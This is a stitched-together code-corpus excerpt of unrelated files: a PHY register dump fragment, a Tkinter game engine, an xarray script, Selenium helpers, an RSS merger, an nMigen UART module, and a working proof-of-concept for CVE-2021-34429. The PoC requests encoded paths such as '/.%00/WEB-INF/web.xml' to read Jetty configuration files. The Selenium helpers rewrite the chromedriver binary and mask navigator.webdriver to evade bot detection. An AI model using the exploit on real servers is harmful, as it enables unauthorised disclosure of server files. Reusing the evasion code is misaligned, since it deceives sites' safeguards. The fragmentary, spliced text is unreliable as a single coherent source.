"register_name": "Next Page Transmit Register",
"bits": "0010000000000001",
},
"8": {
"register_number": "0008",
"hex_bit_value": "4e92",
"register_name": "Link Partner Next page Register ",
"bits": "0100111010010010",
},
"9": {
"register_number": "0009",
"hex_bit_value": "0e00",
"register_name": "1000T Base Control",
"bits": "0000111000000000",
},
"10": {
"register_number": "0010",
"hex_bit_value": "0001",
"register_name": "PHY Specific Control",
"bits": "0000000000000001",
},
"11": {
"register_number": "0011",
"hex_bit_value": "1303",
"register_name": "PHY Specific Status",
"bits": "0001001100000011",
},
"12": {
"register_number": "0012",
"hex_bit_value": "0000",
"register_name": "PHY Specific Interrupt Enable",
"bits": "0000000000000000",
},
"13": {
"register_number": "0013",
"hex_bit_value": "0000",
"register_name": "PHY Specific Interrupt Status",
"bits": "0000000000000000",
},
"14": {
"register_number": "003d",
"hex_bit_value": "c000",
"register_name": "EEE Test Ctrl(0x803D)",
"bits": "1100000000000000",
},
"15": {
"register_number": "0001",
"hex_bit_value": "0046",
"register_name": "EEE PCS Status1(0x1)",
"bits": "0000000001000110",
},
"16": {
"register_number": "0014",
"hex_bit_value": "0006",
"register_name": "EEE Capability Reg(0x14)",
"bits": "0000000000000110",
},
"17": {
"register_number": "003c",
"hex_bit_value": "0000",
"register_name": "EEE Advertisement Ctrl(0x3C)",
"bits": "0000000000000000",
},
"18": {
"register_number": "003d",
"hex_bit_value": "0000",
"register_name": "EEE Link Partnet Advrt(0x3D)",
"bits": "0000000000000000",
},
"19": {
"register_number": "003e",
"hex_bit_value": "0000",
"register_name": "EEE Resolution Status(0x803E)",
"bits": "0000000000000000",
},
"20": {
"register_number": "001a",
"hex_bit_value": "247e",
"register_name": "Cu Interrupt Status(0x1A)",
"bits": "0010010001111110",
},
"21": {
"register_number": "001b",
"hex_bit_value": "0f7e",
"register_name": "Cu Interrupt Mask(0x1B)",
"bits": "0000111101111110",
},
"22": {
"register_number": "001e",
"hex_bit_value": "0000",
"register_name": "Test 1 Reg(0x1E)",
"bits": "0000000000000000",
},
"23": {
"register_number": "002a",
"hex_bit_value": "06c2",
"register_name": "Cu Power MII Ctrl RDB(0x02A)",
"bits": "0000011011000010",
},
"24": {
"register_number": "002c",
"hex_bit_value": "4004",
"register_name": "Cu Misc Test RDB(0x02C)",
"bits": "0100000000000100",
},
"25": {
"register_number": "0003",
"hex_bit_value": "82f3",
"register_name": "DTE MII Control(0x03)",
"bits": "1000001011110011",
},
"26": {
"register_number": "0007",
"hex_bit_value": "7277",
"register_name": "Cu Misc Cntrl Reg(0x07)",
"bits": "0111001001110111",
},
"27": {
"register_number": "00e4",
"hex_bit_value": "0000",
"register_name": "10Base-T Radiation RDB Reg(0x01e4)",
"bits": "0000000000000000",
},
"28": {
"register_number": "00ea",
"hex_bit_value": "0100",
"register_name": "10Base-T Radiation RDB Reg(0x01ea)",
"bits": "0000000100000000",
},
"29": {
"register_number": "0021",
"hex_bit_value": "7ea8",
"register_name": "RDB Reg(0x21)",
"bits": "0111111010101000",
},
"30": {
"register_number": "002b",
"hex_bit_value": "82f3",
"register_name": "RDB Reg(0x2B)",
"bits": "1000001011110011",
},
"31": {
"register_number": "002f",
"hex_bit_value": "7277",
"register_name": "RDB Reg(0x2F)",
"bits": "0111001001110111",
},
"32": {
"register_number": "0009",
"hex_bit_value": "871c",
"register_name": "RDB Reg(0x09)",
"bits": "1000011100011100",
},
"33": {
"register_number": "000c",
"hex_bit_value": "8800",
"register_name": "RDB Reg(0x0C)",
"bits": "1000100000000000",
},
"34": {
"register_number": "0019",
"hex_bit_value": "871c",
"register_name": "Cu Aux Status Summary(0x19)",
"bits": "1000011100011100",
},
},
}
| 1.421875 | 1 |
GameEngine/Application.py | Nathcat/2D-GameEngine | 0 | 12770842 | from tkinter import *
from PIL import ImageTk, Image
from GameEngine.Vector import *
class Application:
    """Tkinter-based game window: renders registered game objects at a fixed
    frame rate and dispatches key events to registered action listeners."""
    def __init__(self, title, size, fps):
        """Create the window (title, (width, height), frames per second) and
        schedule the first frame."""
        self.root = Tk()
        self.root.title(title)
        self.width, self.height = size
        self.root.geometry(f"{self.width}x{self.height}")
        self.root.bind("<Key>", self.__handle_key_press)
        self.fps = fps
        self.__widgets = []
        self.__task_list = []
        self.__game_objects = []
        self.__action_listeners = []
        # Kick off the render loop; new_frame re-schedules itself via render_window.
        self.root.after(int((1 / self.fps) * 1000), self.new_frame)
    def render_window(self):
        """Replace all widgets with the current frame, run update tasks, and
        schedule the next frame."""
        for slave in self.root.slaves():
            slave.destroy()
        for widget in self.__widgets:
            widget[0].place(x=widget[1], y=widget[2])
        self.execute_task_list()
        self.root.after(int((1 / self.fps) * 1000), self.new_frame)
    def new_frame(self):
        """Collect each object's sprite, composite them into a frame image,
        and hand it to render_window as a single Label widget."""
        sprites = []
        for obj in self.__game_objects:
            render_result = obj.render()
            if render_result is not None:
                sprites.append((render_result, obj.position, obj.rotation))
        # NOTE: this is the module-local Frame class below, which shadows
        # tkinter.Frame pulled in by the star import.
        frame = Frame((self.width, self.height))
        for sprite in sprites:
            frame.write_sprite(sprite)
        frame = ImageTk.PhotoImage(frame.image)
        self.__widgets = [
            [
                Label(self.root, image=frame),
                0, 0
            ]
        ]
        # Keep a reference on the Label so the PhotoImage is not garbage-collected.
        self.__widgets[0][0].image = frame
        self.render_window()
    def execute_task_list(self):
        """Run every registered per-frame update task."""
        for task in self.__task_list:
            task()
    def add_object(self, object):
        """Register a game object; its update() runs every frame.
        (Parameter name shadows the builtin ``object``.)"""
        self.__game_objects.append(object)
        self.__task_list.append(object.update)
    def add_action_listener(self, obj):
        """Register an object with ``key`` and ``action()`` for key events."""
        self.__action_listeners.append(obj)
    def __handle_key_press(self, event):
        # Fire every listener whose key matches the pressed character.
        for action_listener in self.__action_listeners:
            if action_listener.key == event.char:
                action_listener.action()
    def bind_special_key(self, key_name, f):
        """Bind a raw Tk key name (e.g. '<Escape>') directly to callback f."""
        self.root.bind(key_name, f)
class Frame:
    """A software framebuffer backed by a PIL RGBA image, initially opaque black."""
    def __init__(self, size):
        self.width, self.height = size
        self.image = Image.new("RGBA", size=(self.width, self.height))
        self.image.putdata([(0, 0, 0, 255) for i in range(0, self.width * self.height)])
    def write_sprite(self, sprite_data):
        """Blit a sprite's pixels into this frame at ``position``.

        sprite_data is ``(sprite_image, position, rotation)``; note that
        ``rotation`` is unpacked but currently unused. Pixels are copied 1:1
        (including alpha). NOTE(review): positions are not clipped -- a sprite
        extending past the right/bottom edge raises IndexError, and negative
        coordinates wrap around via Python list indexing. This is pure-Python
        per-pixel work, O(width*height) per call.
        """
        sprite, position, rotation = sprite_data
        # Expand the frame's flat pixel sequence into a 2D row/column grid.
        pixels_ = self.image.getdata()
        pixels = []
        p_counter = 0
        for y in range(0, self.image.height):
            pixels.append([])
            for x in range(0, self.image.width):
                pixels[y].append(pixels_[p_counter])
                p_counter += 1
        # Same 2D expansion for the sprite's pixels.
        sprite_pixels_ = sprite.getdata()
        sprite_pixels = []
        p_counter = 0
        for y in range(0, sprite.height):
            sprite_pixels.append([])
            for x in range(0, sprite.width):
                sprite_pixels[y].append(sprite_pixels_[p_counter])
                p_counter += 1
        # Walk the sprite row by row, copying into the frame grid.
        p_counter = 0
        write_position = position
        pixel_position = Vector()
        for y in range(0, len(sprite_pixels)):
            for x in range(0, len(sprite_pixels[pixel_position.y])):
                pixels[write_position.y][write_position.x] = sprite_pixels[pixel_position.y][pixel_position.x]
                p_counter += 1
                write_position += Vector(1, 0)
                pixel_position += Vector(1, 0)
            # Carriage-return to the start of the next row.
            pixel_position.x = 0
            pixel_position.y += 1
            write_position.x = position.x
            write_position.y += 1
        # Flatten the grid back into the PIL image.
        new_data = []
        for y in range(0, len(pixels)):
            for x in range(0, len(pixels[y])):
                new_data.append(pixels[y][x])
        self.image.putdata(new_data)
| 2.859375 | 3 |
hello-xarray/write_profile.py | NIVANorge/s-enda-playground | 0 | 12770843 | #%%
from datetime import datetime
import xarray as xr
from cfxarray.profile import depthcoords, profiledataset
from cfxarray.base import dataarraybydepth
# %%
temperature1 = dataarraybydepth(
name="temperature",
standard_name="sea_water_temperature",
long_name="Sea water temperature",
units="degree_Celsius",
data=[10, 15],
).assign_coords(
depthcoords(
depth=[1, 2],
time=datetime.fromisoformat("1970-01-01T00:00:00"),
latitude=59.95,
longitude=10.75,
)
)
# %%
ds1 = profiledataset([temperature1], "profile1", "title", "summary", ["keyword"])
# %%
temperature2 = dataarraybydepth(
name="temperature",
standard_name="sea_water_temperature",
long_name="Sea water temperature",
units="degree_Celsius",
data=[20, 255, 2000, 100],
).assign_coords(
depthcoords(
depth=[1, 2, 10, 20],
time=datetime.fromisoformat("1980-01-01T00:00:00"),
latitude=59.95,
longitude=10.75,
)
)
# %%
ds2 = profiledataset([temperature2], "profile2", "title", "summary", ["keyword"])
# %%
ds = xr.concat([ds1, ds2], dim="profile_name")
# %%
ds.temperature.sel(profile_name="profile1").plot.line("o")
# %%
| 2.0625 | 2 |
utils/selenium_utils.py | Brandonthe/oosbot | 0 | 12770844 | from chromedriver_py import binary_path as driver_path
from selenium.webdriver import DesiredCapabilities
from selenium.webdriver import Chrome, ChromeOptions # TODO: Combine these two dependencies. Leaving it for now since it touches too many sites atm.
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.wait import WebDriverWait
from utils import create_msg
import random, re, requests, string, threading
# https://github.com/Hari-Nagarajan/nvidia-bot/blob/master/utils/selenium_utils.py
# Shared ChromeOptions: strip the automation banner/switches and extension so
# sites are less likely to flag the browser as Selenium-driven.
options = Options()
options.add_experimental_option(
    "excludeSwitches", ["enable-automation", "enable-logging"]
)
options.add_experimental_option("useAutomationExtension", False)
class AnyEc:
    """Use with WebDriverWait to combine expected_conditions in an OR.

    ``WebDriverWait.until`` keeps polling while the condition returns a falsy
    value, so returning ``None`` (implicitly) when no sub-condition matches is
    intentional.
    """

    def __init__(self, *args):
        # Sub-conditions: callables taking the driver, as expected_conditions do.
        self.ecs = args

    def __call__(self, driver):
        for fn in self.ecs:
            try:
                if fn(driver):
                    return True
            except Exception:
                # A sub-condition may legitimately raise while the page is not
                # ready; treat that as "not satisfied" and try the next one.
                # Narrowed from a bare ``except`` so KeyboardInterrupt and
                # SystemExit still propagate.
                pass
def no_amazon_image():
    """Disable image loading (pref value 2) on the module-wide Chrome options."""
    prefs = {"profile.managed_default_content_settings.images": 2}
    options.add_experimental_option("prefs", prefs)
def yes_amazon_image():
    """Re-enable image loading (pref value 0) on the module-wide Chrome options."""
    prefs = {"profile.managed_default_content_settings.images": 0}
    options.add_experimental_option("prefs", prefs)
def wait_for_element(d, e_id, time=30):
    """
    Uses webdriver(d) to wait up to `time` seconds for the element with
    id `e_id` to be present; returns the element.
    """
    return WebDriverWait(d, time).until(ec.presence_of_element_located((By.ID, e_id)))
def wait_for_element_by_xpath(d, e_path, time=30):
    """
    Uses webdriver(d) to wait up to `time` seconds for the element matching
    XPath `e_path` to be present; returns the element.
    """
    return WebDriverWait(d, time).until(
        ec.presence_of_element_located((By.XPATH, e_path))
    )
def wait_for_element_by_class(d, e_class, time=30):
    """
    Uses webdriver(d) to wait up to `time` seconds for an element with CSS
    class `e_class` to be present; returns the element.
    """
    return WebDriverWait(d, time).until(
        ec.presence_of_element_located((By.CLASS_NAME, e_class))
    )
def wait_for_title(d, title, path):
    """
    Uses webdriver(d) to navigate to get(path) until the page title equals
    `title`.

    NOTE(review): `WebDriverWait(d, 1000)` only constructs the waiter without
    calling `.until(...)`, so it is a no-op -- this loop reloads the page
    back-to-back with no delay between attempts. Confirm intent before fixing.
    """
    while d.title != title:
        d.get(path)
        WebDriverWait(d, 1000)
def wait_for_page(d, title, time=30):
    """
    Uses webdriver(d) to wait up to `time` seconds for the page title to
    equal `title`.
    """
    WebDriverWait(d, time).until(ec.title_is(title))
def wait_for_either_title(d, title1, title2, time=30):
    """
    Uses webdriver(d) to wait up to `time` seconds for the page title to
    become either `title1` or `title2`. A timeout is deliberately swallowed:
    this helper is best-effort and returns normally even if neither title
    appears.
    """
    try:
        WebDriverWait(d, time).until(AnyEc(ec.title_is(title1), ec.title_is(title2)))
    except Exception:
        pass
def wait_for_any_title(d, titles, time=30):
    """
    Uses webdriver(d) to wait up to `time` seconds for the page title to
    become any title in the list `titles`. Unlike wait_for_either_title,
    a timeout here propagates to the caller.
    """
    WebDriverWait(d, time).until(AnyEc(*[ec.title_is(title) for title in titles]))
def button_click_using_xpath(d, xpath):
    """
    Uses webdriver(d) to click a button using an XPath(xpath).
    Waits up to 10 s for the element to become clickable, then moves the
    mouse to it, pauses 1 s, and clicks -- the pause makes the interaction
    look less bot-like.
    """
    button_menu = WebDriverWait(d, 10).until(
        ec.element_to_be_clickable((By.XPATH, xpath))
    )
    action = ActionChains(d)
    action.move_to_element(button_menu).pause(1).click().perform()
def field_send_keys(d, field, keys):
    """
    Uses webdriver(d) to find a field by its name attribute (`field`),
    clears it, and sends `keys`.
    """
    elem = d.find_element_by_name(field)
    elem.clear()
    elem.send_keys(keys)
def has_class(element, class_name):
    """Return True if *class_name* occurs in the element's ``class`` attribute.

    Note this is a plain substring test, so ``has_class(el, "btn")`` also
    matches an element whose class list contains ``"btn-primary"``.
    """
    return class_name in element.get_attribute("class")
def add_cookies_to_session_from_driver(driver, session):
    """Copy every cookie from a Selenium *driver* into a ``requests`` *session*.

    Only the domain/name/value fields are carried over; that is sufficient for
    replaying authenticated requests outside the browser.
    """
    # Plain loop instead of a throwaway list comprehension: this code runs
    # purely for its side effect on the session's cookie jar.
    for cookie in driver.get_cookies():
        session.cookies.set_cookie(
            requests.cookies.create_cookie(
                domain=cookie["domain"],
                name=cookie["name"],
                value=cookie["value"],
            )
        )
def enable_headless():
    """Switch the module-wide Chrome options to headless operation
    (plus the no-sandbox/shm flags commonly needed in containers)."""
    options.add_argument("--headless")
    options.add_argument("--no-sandbox")
    options.add_argument("--disable-dev-shm-usage")
# https://stackoverflow.com/questions/33225947/can-a-website-detect-when-you-are-using-selenium-with-chromedriver
def change_driver(status_signal, loc):
    """Randomize the tell-tale ``$xxx_..._`` marker inside the chromedriver
    binary at *loc* so naive Selenium-detection scripts miss it.

    status_signal: Qt-style signal used for progress reporting; only emitted
    when a replacement is actually made. No-op if the marker is absent.
    """
    # Context managers replace the manual open/close pairs so the handles are
    # released even if reading or writing raises.
    with open(loc, 'rb') as fin:
        data = fin.read()
    # Replacement keeps the exact shape "$" + 3 lowercase + "_" + 22 alnum + "_"
    # so the binary's layout is unchanged.
    val = "$" + "".join(random.choices(string.ascii_lowercase, k=3)) + "_" + \
          "".join(random.choices(string.ascii_letters + string.digits, k=22)) + "_"
    result = re.search(b"[$][a-z]{3}_[a-zA-Z0-9]{22}_", data)
    if result is None:
        # Nothing to patch (already randomized or an unexpected build).
        return
    status_signal.emit(create_msg("Changing value in Chromedriver", "normal"))
    data = data.replace(result.group(0), val.encode())
    # Opening with 'wb' truncates, so the explicit truncate() is unnecessary.
    with open(loc, 'wb') as fout:
        fout.write(data)
def open_browser(link, cookies):
    """Launch start_browser(link, cookies) on a daemon-less background thread
    so the caller is not blocked while the browser starts."""
    threading.Thread(target=start_browser, args=(link, cookies)).start()
def start_browser(link, cookies):
    """Start a stealth-configured Chrome, visit *link*, install *cookies*
    (each a dict with name/value/domain), and reload the page with them.

    The CDP script below patches ``navigator`` on every new document so that
    the ``webdriver`` property reads as undefined, defeating the common
    Selenium-detection check.
    """
    caps = DesiredCapabilities().CHROME
    # "eager" returns from get() at DOMContentLoaded instead of full load.
    caps["pageLoadStrategy"] = "eager"
    chrome_options = ChromeOptions()
    chrome_options.add_experimental_option("excludeSwitches", ["enable-automation"])
    chrome_options.add_experimental_option("useAutomationExtension", False)
    driver = Chrome(desired_capabilities=caps, executable_path=driver_path, options=chrome_options)
    driver.execute_cdp_cmd(
        "Page.addScriptToEvaluateOnNewDocument",
        {
            "source": """
            Object.defineProperty(window, 'navigator', {
            value: new Proxy(navigator, {
                has: (target, key) => (key === 'webdriver' ? false : key in target),
                get: (target, key) =>
                    key === 'webdriver'
                    ? undefined
                    : typeof target[key] === 'function'
                    ? target[key].bind(target)
                    : target[key]
            })
            })
            """
        },
    )
    # First navigation establishes the domain so add_cookie is permitted.
    driver.get(link)
    for cookie in cookies:
        driver.add_cookie({
            "name": cookie["name"],
            "value": cookie["value"],
            "domain": cookie["domain"]
        })
    # Reload so the page is served with the injected cookies.
    driver.get(link)
| 2.3125 | 2 |
2021/CVE-2021-34429/poc/pocsploit/CVE-2021-34429.py | hjyuan/reapoc | 421 | 12770845 | <reponame>hjyuan/reapoc
import requests
# Vuln Base Info
# Vuln Base Info
def info():
    """Return the static metadata record for CVE-2021-34429 (Jetty WEB-INF
    disclosure); attached to successful poc() results."""
    return {
        "author": "cckuailong",
        "name": '''Jetty Authorization Before Parsing and Canonicalization Variation''',
        "description": '''For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.''',
        "severity": "medium",
        "references": [
            "https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "cvss-score": "",
            "cve-id": "CVE-2021-34429",
            "cwe-id": "CWE-200"
        },
        "metadata":{
            "vuln-target": "",
        },
        "tags": ["cve", "cve2021", "jetty"],
    }
# Vender Fingerprint
# Vender Fingerprint
def fingerprint(url):
    """Pre-check hook; always True because there is no passive fingerprint
    here -- poc() performs the actual vulnerability check."""
    return True
# Proof of Concept
def poc(url):
    """Probe *url* for CVE-2021-34429 (Jetty WEB-INF content disclosure).

    Returns a dict that always contains a boolean ``success`` key; on a hit
    it also carries the vulnerability ``info`` and the triggering ``payload``
    URL.
    """
    # Start from a failed verdict so the key exists even when the target
    # responds normally (previously the dict could be returned empty in the
    # "reachable but not vulnerable" case).
    result = {"success": False}
    try:
        url = format_url(url)
        # First traversal variant (%u002e); kept for parity with the original
        # probe sequence, its response is not evaluated.
        requests.request(
            method="GET",
            url=url + "/%u002e/WEB-INF/web.xml",
            data="",
            headers={},
            timeout=10,
            verify=False,
            allow_redirects=False,
        )
        # Second traversal variant (.%00) -- this is the decisive check.
        resp = requests.request(
            method="GET",
            url=url + "/.%00/WEB-INF/web.xml",
            data="",
            headers={},
            timeout=10,
            verify=False,
            allow_redirects=False,
        )
        if (
            resp.status_code == 200
            and ("""</web-app>""" in resp.text and """java.sun.com""" in resp.text)
            and ("""application/xml""" in str(resp.headers))
        ):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + "/.%00/WEB-INF/web.xml"
    except Exception:
        # Network errors / timeouts simply mean the check failed; narrowed
        # from a bare except so KeyboardInterrupt still propagates.
        result["success"] = False
    return result
# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; identical to poc() for this read-only disclosure."""
    return poc(url)
# Utils
def format_url(url):
    """Normalize a user-supplied URL.

    Strips surrounding whitespace, prepends ``http://`` when no scheme is
    present, and removes any trailing slashes.
    """
    url = url.strip()
    # startswith accepts a tuple of prefixes -- one call covers both schemes.
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    return url.rstrip('/')
feedcollector/rss.py | ctnitschke/feedcollector | 0 | 12770846 | """
Module for handling of RSS (as in Really Simple Syndication
or Rich Site Summary) feeds.
:copyright: (c) 2019 by <NAME>
:license: Apache 2.0, see LICENSE for more details.
"""
from .util import hash_xml_subtree
def merge_feeds(new_root, old_root):
    """
    Merge two rss feeds contained in xml.etree.ElementTree.ElementTrees.

    Args:
        new_root: xml.etree.ElementTree.ElementTree containing the
            rss feed considered as new.
        old_root: xml.etree.ElementTree.ElementTree containing the
            rss feed considered as reference.

    Returns:
        xml.etree.ElementTree.ElementTree with the merged rss feed,
        containing both old and new elements.
    """
    new_channel = new_root.find('channel')
    old_channel = old_root.find('channel')

    # Index the new channel's items: guids where available, with subtree
    # hashes as a safety net for guid-less items.
    known_guids = set()
    known_hashes = set()
    for item in new_channel.findall('item'):
        guid = item.find('guid')
        if guid is None:
            known_hashes.add(hash_xml_subtree(item))
        else:
            known_guids.add(guid.text)

    # Carry over every old item that is not already represented in the
    # new channel, comparing by guid when present and by hash otherwise.
    for item in old_channel.findall('item'):
        guid = item.find('guid')
        if guid is None:
            if hash_xml_subtree(item) not in known_hashes:
                new_channel.append(item)
        elif guid.text not in known_guids:
            new_channel.append(item)

    return new_root
| 2.65625 | 3 |
fv-beginner/ex-08-memory/memtx.py | DonaldKellett/nmigen-beginner | 1 | 12770847 | from nmigen import *
from nmigen.back.pysim import *
from nmigen.asserts import *
from nmigen.test.utils import *
from nmigen.build import *
from nmigen.build import ResourceError
from nmigen.vendor.lattice_ecp5 import *
from nmigen_boards.resources import *
from functools import reduce
from math import ceil, log
import itertools
import os
import subprocess
from txuart import *
__all__ = ['MemTX', 'MemTXDemo', 'VersaECP5Platform']
"""
Transmitting a long message from block RAM
See http://zipcpu.com/tutorial/lsn-08-memory.pdf for more details
"""
class MemTX(Elaboratable):
    """Streams the contents of psalm.txt out of block RAM over a UART.

    Interface: i_reset restarts a finished transmission, o_busy is high while
    bytes remain, o_uart_tx is the serial line. With fv_mode set, elaborate()
    also emits the formal assumptions/assertions used by the proof below.
    """
    def __init__(self, fv_mode = False):
        self.i_reset = Signal(1, reset=0)
        self.o_busy = Signal(1, reset=1)
        self.o_uart_tx = Signal(1, reset=1)
        self.fv_mode = fv_mode
    def ports(self):
        """Signals exposed for simulation traces."""
        return [self.i_reset, self.o_busy, self.o_uart_tx]
    def elaborate(self, platform):
        m = Module()
        # The message is baked into block RAM at build time.
        psalm_bytes = None
        with open('psalm.txt', 'rb') as psalm_file:
            psalm_bytes = list(psalm_file.read())
        # On real hardware, drive the board's UART TX pin directly.
        if platform is not None and platform != 'formal':
            self.o_uart_tx = platform.request('uart').tx.o
        ADDRESS_WIDTH = ceil(log(len(psalm_bytes), 2))
        ram = Memory(width=8, depth=1<<ADDRESS_WIDTH, init=psalm_bytes)
        m.submodules.rdport = rdport = ram.read_port()
        o_addr = Signal(ADDRESS_WIDTH, reset=0)
        i_data = Signal(8)
        m.d.comb += rdport.addr.eq(o_addr)
        m.d.comb += i_data.eq(rdport.data)
        o_wr = Signal(1, reset=0)
        i_busy = Signal(1, reset=0)
        m.submodules.txuart = txuart = TXUART(o_wr, i_data, i_busy, self.o_uart_tx, self.fv_mode)
        # Per-byte micro-sequencer: 0 = raise write strobe, 1 = drop strobe,
        # 2 = wait for the UART, then advance (or finish/restart).
        counter = Signal(2, reset=0)
        with m.If(counter == 0):
            m.d.sync += o_wr.eq(1)
            m.d.sync += counter.eq(1)
        with m.Elif(counter == 1):
            m.d.sync += o_wr.eq(0)
            m.d.sync += counter.eq(2)
        with m.Elif(~i_busy):
            with m.If(o_addr == len(psalm_bytes) - 1):
                m.d.sync += self.o_busy.eq(0)
                with m.If(self.i_reset & ~self.o_busy):
                    m.d.sync += self.o_busy.eq(1)
                    m.d.sync += o_addr.eq(0)
                    m.d.sync += counter.eq(0)
            with m.Else():
                m.d.sync += o_addr.eq(o_addr + 1)
                m.d.sync += counter.eq(0)
        if self.fv_mode:
            """
            Indicator of when Past() is valid
            """
            f_past_valid = Signal(1, reset=0)
            m.d.sync += f_past_valid.eq(1)
            """
            Assumptions on input pins
            """
            # i_reset is de-asserted whenever o_busy is asserted
            with m.If(self.o_busy):
                m.d.comb += Assume(~self.i_reset)
            # o_busy is de-asserted for at most 10 consecutive clock cycles before i_reset is asserted
            f_past10_valid = Signal(1, reset=0)
            f_past10_ctr = Signal(range(10), reset=0)
            m.d.sync += f_past10_ctr.eq(f_past10_ctr + 1)
            with m.If(f_past10_ctr == 9):
                m.d.sync += f_past10_ctr.eq(f_past10_ctr)
                m.d.sync += f_past10_valid.eq(1)
            with m.If(f_past10_valid & reduce(lambda a, b: a & b, \
                (((~Past(self.o_busy, i)) & (~Past(self.i_reset, i))) for i in range(1, 11)))):
                m.d.comb += Assume(self.i_reset)
            # The initial data in the read port of the block RAM corresponds to address 0x0
            with m.If(~f_past_valid):
                m.d.comb += Assume(rdport.data == ram[0])
            # The data corresponding to the address applied to the read port of the block RAM always
            # appears one clock cycle later
            with m.If(f_past_valid):
                m.d.comb += Assume(rdport.data == ram[Past(rdport.addr)])
            # i_busy is initially de-asserted
            with m.If(~f_past_valid):
                m.d.comb += Assume(~i_busy)
            # i_busy is never asserted on its own
            with m.If(f_past_valid & (~Past(i_busy)) & ~Past(o_wr)):
                m.d.comb += Assume(~i_busy)
            # When the transmitter is idle, it responds immediately to write requests
            with m.If(f_past_valid & (~Past(i_busy)) & Past(o_wr)):
                m.d.comb += Assume(i_busy)
            # i_busy is asserted for at most 10 consecutive clock cycles
            with m.If(f_past10_valid & reduce(lambda a, b: a & b, \
                (Past(i_busy, i) for i in range(1, 11)))):
                m.d.comb += Assume(~i_busy)
            """
            Properties of o_busy
            """
            # o_busy is initially asserted
            with m.If(~f_past_valid):
                m.d.comb += Assert(self.o_busy)
            # o_busy is asserted whenever a transmission is taking place
            with m.If((o_addr != len(psalm_bytes) - 1) | (counter < 2) | i_busy):
                m.d.comb += Assert(self.o_busy)
            # o_busy is de-asserted one clock cycle after the transmission is complete
            with m.If(f_past_valid & (Past(o_addr) == len(psalm_bytes) - 1) & (Past(counter) == 2) & \
                (~Past(i_busy)) & ~Past(self.i_reset)):
                m.d.comb += Assert(~self.o_busy)
            """
            Properties of o_addr
            """
            # o_addr is initially zero
            with m.If(~f_past_valid):
                m.d.comb += Assert(o_addr == 0)
            # o_addr remains stable during transmission
            with m.If(f_past_valid & ((Past(counter) < 2) | Past(i_busy))):
                m.d.comb += Assert(Stable(o_addr))
            # Except for the last byte, o_addr increments by 1 at the end of each transmission
            with m.If(f_past_valid & (Past(o_addr) != len(psalm_bytes) - 1) & (Past(counter) == 2) & \
                ~Past(i_busy)):
                m.d.comb += Assert(o_addr == Past(o_addr) + 1)
            # For the last byte, o_addr is set to 0 at the end of the transmission when i_reset is
            # asserted
            with m.If(f_past_valid & (Past(o_addr) == len(psalm_bytes) - 1) & (Past(counter) == 2) & \
                (~Past(i_busy)) & Past(self.i_reset)):
                m.d.comb += Assert(o_addr == 0)
            """
            Properties of i_data
            """
            # Except when counter is zero, i_data should contain the data corresponding to the given
            # address
            with m.If(counter != 0):
                m.d.comb += Assert(i_data == ram[o_addr])
            """
            Properties of o_wr
            """
            # o_wr is de-asserted whenever i_busy is asserted
            with m.If(i_busy):
                m.d.comb += Assert(~o_wr)
            # o_wr is asserted precisely when counter is 1, and de-asserted otherwise
            with m.If(counter == 1):
                m.d.comb += Assert(o_wr)
            with m.Else():
                m.d.comb += Assert(~o_wr)
            """
            Properties of counter
            """
            # Counter is always counting up when it is less than 2
            with m.If(f_past_valid & (Past(counter) < 2)):
                m.d.comb += Assert(counter == Past(counter) + 1)
            # Counter remains stable at 2 so long as the transmitter is busy
            with m.If(f_past_valid & (Past(counter) == 2) & Past(i_busy)):
                m.d.comb += Assert(Stable(counter))
            # Except for the last byte, counter resets to 0 as soon as the transmitter is idle
            with m.If(f_past_valid & (Past(o_addr) != len(psalm_bytes) - 1) & (Past(counter) == 2) & \
                ~Past(i_busy)):
                m.d.comb += Assert(counter == 0)
            # For the last byte, counter resets to 0 once transmitter is idle as soon as i_reset is
            # asserted
            with m.If(f_past_valid & (Past(o_addr) == len(psalm_bytes) - 1) & (Past(counter) == 2) & \
                (~Past(i_busy)) & Past(self.i_reset)):
                m.d.comb += Assert(counter == 0)
        return m
class MemTXDemo(Elaboratable):
    """
    Demo driver for MemTX
    """
    def elaborate(self, platform):
        # Hardware-only: the demo relies on a real clock/UART.
        if platform is None:
            raise ValueError('MemTXDemo does not support simulation!')
        if platform == 'formal':
            raise ValueError('MemTXDemo does not support formal verification!')
        m = Module()
        m.submodules.memtx = memtx = MemTX()
        # Free-running counter; periodically pulses i_reset so the message
        # re-transmits roughly once per counter wrap.
        counter = Signal(30)
        m.d.sync += memtx.i_reset.eq(0)
        m.d.sync += counter.eq(counter + 1)
        with m.If(counter == 0x3FFFFFFF):
            m.d.sync += memtx.i_reset.eq(1)
        return m
if __name__ == '__main__':
    """
    Sanity Check
    """
    # class Ctr32(Elaboratable):
    #     def elaborate(self, platform):
    #         if platform is None:
    #             raise ValueError('Ctr32 does not support simulation!')
    #         if platform == 'formal':
    #             raise ValueError('Ctr32 does not support formal verification!')
    #         m = Module()
    #         ctr = Signal(32, reset=0)
    #         m.d.sync += ctr.eq(ctr + 1)
    #         m.d.comb += platform.request('led', 0).o.eq(ctr >= 0x7FFFFFFF)
    #         m.d.comb += platform.request('led', 1).o.eq(ctr >= 0x7FFFFFFF)
    #         m.d.comb += platform.request('led', 2).o.eq(ctr >= 0x7FFFFFFF)
    #         m.d.comb += platform.request('led', 3).o.eq(ctr >= 0x7FFFFFFF)
    #         m.d.comb += platform.request('led', 4).o.eq(ctr >= 0x7FFFFFFF)
    #         m.d.comb += platform.request('led', 5).o.eq(ctr >= 0x7FFFFFFF)
    #         m.d.comb += platform.request('led', 6).o.eq(ctr >= 0x7FFFFFFF)
    #         m.d.comb += platform.request('led', 7).o.eq(ctr >= 0x7FFFFFFF)
    #         return m
    # VersaECP5Platform().build(Ctr32(), do_program=True)
    """
    Simulation
    """
    # Run 20k cycles at 100 MHz and dump waveforms for GTKWave.
    m = Module()
